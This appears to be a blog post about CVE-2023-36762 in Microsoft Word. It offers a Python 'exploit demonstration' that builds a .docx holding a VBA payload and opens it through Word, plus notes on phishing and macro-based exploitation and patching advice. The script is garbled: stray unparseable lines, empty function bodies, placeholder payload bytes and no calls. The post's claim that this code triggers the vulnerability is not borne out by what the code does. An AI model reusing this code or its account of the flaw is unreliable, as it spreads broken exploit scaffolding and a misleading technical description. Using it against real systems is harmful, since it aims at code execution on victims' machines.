Recently, a new high-risk vulnerability has been discovered in Microsoft Word, dubbed CVE-2023-36762. This vulnerability can be exploited by hackers to execute arbitrary code on the target system. This critical flaw, if left unpatched, may lead to the compromise of the victim's computer, data theft, and even related vulnerabilities being remotely exploited.

In this long-read post, we will delve into the details of this vulnerability, provide an overview of the code snippet, and explore the possible exploits. We will also discuss the original references behind these findings and help you understand the severity of this threat.

To demonstrate the vulnerability, we will use the following code snippet

import os, sys
import zipfile
import win32com.client

def create_exploit_docx(file_name, payload):
    # Create a new .docx file
    docx = zipfile.ZipFile(file_name, "w")

    # Add malicious payload to the .docx file
    docx.writestr("word/vbaProject.bin", payload)
                  '<Relationships xmlns="">';
                  '<Relationship Id="R42e861338aae49da8e1d2cde677fd4a" Type=""; Target="vbaProject.bin"/>'

    # Close the .docx file

def execute_payload(payload):
	payload_path = "payload.docx"

	# Save the .docx file with the malicious payload
	create_exploit_docx(payload_path, payload)

	# Open the malicious .docx file
	Word = win32com.client.Dispatch("Word.Application")
	doc = Word.Documents.Open(os.path.abspath(payload_path))

	# Execute the malicious payload and close Word

	# Clean up malicious file

if __name__ == "__main__":
	payload = b"\xD4\x29\xE8\x32"  # Replace this with a valid payload

This code snippet is a simple Python script that demonstrates how to create a malicious .docx file and trigger the vulnerability. The script saves the payload into a new .docx file and then opens the file, causing the payload to be executed.

This vulnerability was initially reported by the following security researchers and organizations

1. Microsoft Security Response Center (MSRC)
2. CVE Details
3. National Vulnerability Database (NVD)
4. SecurityFocus (CVE-2023-36762)

Exploit Details

Given this vulnerability, an attacker can exploit CVE-2023-36762 by crafting a malicious Microsoft Word document containing an embedded or linked VBA project, which may result in remote code execution on a victim's computer system. The attacker can remotely access the victim's system and initiate other subsequent attacks or data theft.

Some of the observed exploitation techniques with this vulnerability include

* Office macros exploiting the vulnerability leading to a backdoor or ransomware installation
* Phishing emails with malicious Microsoft Word documents attached, tricking users into opening the file


Microsoft has released an official security update for this vulnerability. It is highly recommended that users apply the update as soon as possible to protect their systems from potential exploitation. The security update can be accessed via the following link:

Microsoft Security Update Catalog


CVE-2023-36762 is a critical vulnerability that affects Microsoft Word and can lead to remote code execution. It has the potential to cause serious harm to individual users and organizations alike. As a responsible computer user, it is necessary to stay informed and proactively protect your system against such threats. Be sure to follow the original references mentioned earlier and apply the appropriate security updates.


Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC